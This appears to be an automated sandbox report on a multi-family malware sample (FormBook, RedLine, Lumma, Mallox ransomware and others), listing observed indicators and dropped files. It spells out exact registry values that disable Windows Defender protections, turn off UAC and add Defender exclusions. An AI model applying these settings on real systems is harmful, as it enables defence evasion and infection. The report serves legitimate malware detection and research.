Malware Analysis Report

2024-07-11 10:12

Sample ID 240601-tcf1dsga81
Target Trojan;MSIL.FormBook.AFO!MTB.zip
SHA256 69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31
Tags
amadey asyncrat lumma privateloader redline risepro targetcompany xworm 1 49e482 @logscloudyt_bot fresh bootkit collection discovery evasion execution infostealer loader persistence ransomware rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

69811fd3a031d56a72428c7f3f74573b551c2dc9b5fb827fe6740a03eae55f31

Threat Level: Known bad

The file Trojan;MSIL.FormBook.AFO!MTB.zip was found to be: Known bad.

Malicious Activity Summary

TargetCompany,Mallox

Lumma Stealer

Amadey

RisePro

RedLine

AsyncRat

PrivateLoader

Detect Xworm Payload

Modifies firewall policy service

Xworm

RedLine payload

UAC bypass

Windows security bypass

Modifies Windows Defender Real-time Protection settings

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Renames multiple (3581) files with added filename extension

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of local email clients

Identifies Wine through registry keys

Drops startup file

.NET Reactor protector

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Checks BIOS information in registry

Windows security modification

Looks up external IP address via web service

Writes to the Master Boot Record (MBR)

Enumerates connected drives

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Unsigned PE

Enumerates physical storage devices

outlook_win_path

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Enumerates processes with tasklist

Runs ping.exe

Suspicious behavior: RenamesItself

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

System policy modification

Kills process with taskkill

GoLang User-Agent

outlook_office_path

Modifies system certificate store

Modifies registry class

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-01 15:54

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-01 15:54

Reported

2024-06-01 16:41

Platform

win10v2004-20240508-en

Max time kernel

226s

Max time network

404s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

Signatures

Amadey

trojan amadey

AsyncRat

rat asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

TargetCompany,Mallox

ransomware targetcompany

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Desktop\a\New.exe = "0" C:\Users\Admin\Desktop\a\New.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe = "0" C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A

Xworm

trojan rat xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\a\random.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Desktop\a\lenin.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (3581) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\a\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\a\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Desktop\a\lenin.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Desktop\a\lenin.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\mixinte.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\New.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\winlogon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\ADServices.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\ld.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\a\random.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Egt2KEDlnEDPcHbFceEZsAgS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{18CZ3KYJ-176867-G8JF3R-G8JF3REQ8S}.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster2663.lnk C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bAyFUgihOmry7UanLMPlSg0f.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UnWnb8fpIRuRuUDL2hrh8crR.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2663.lnk C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qBZ6zP2KgZdQaOhCd7LCnPnD.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jRT49afIpKbuIh72Jl4Dld3H.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J6M0PD9v12iBlUQzTRVA27yZ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\volumeinfo.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\Zinker.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\ADServices.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\New.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\putty\putty.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\volumeinfo.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\GTA_V.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\CapSimple.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\Desktop\a\RambledMimets.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\ld.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\MSiedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\victor.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\RambledMime.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\current.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\host_so.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\mixinte.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\inte.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\winlogon.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\spanaY6dQFnxKCva\Nccj2wTDtt7ya4Fn9vLo.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\setup.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\file300un.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\spanIHEAubj07gZf\auehhQxGFTG53UPDyJn4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS59CA.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS65EF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\buildjudit.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\go.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\random.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\33333.exe N/A
N/A N/A C:\Users\Admin\Pictures\WeQEAW3kaoXuMbb80vOzIlmY.exe N/A
N/A N/A C:\Users\Admin\Pictures\n5iRSINSSBZXYf0VMxnR1Gr6.exe N/A
N/A N/A C:\Users\Admin\Pictures\U3mkXHCrBXb11u2lOpF29ovV.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\lenin.exe N/A
N/A N/A C:\Users\Admin\Pictures\RTyv5hQ34rQUelr1Ahzlcifr.exe N/A
N/A N/A C:\Users\Admin\Pictures\e9S91KcST5WAe1cLxGRnN3WO.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC3AF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\alex.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\well.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine C:\Users\Admin\Desktop\a\lenin.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Wine C:\Users\Admin\Desktop\a\random.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\a\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\smartsoftsignew.exe N/A
N/A N/A C:\Users\Admin\Desktop\a\360TS_Setup_Mini_WW.Peter.CPI202405_6.6.0.1060.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E9NT7.tmp\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-VJ7S3.tmp\GTA_V.tmp N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3156_133617334690853413\stub.exe N/A
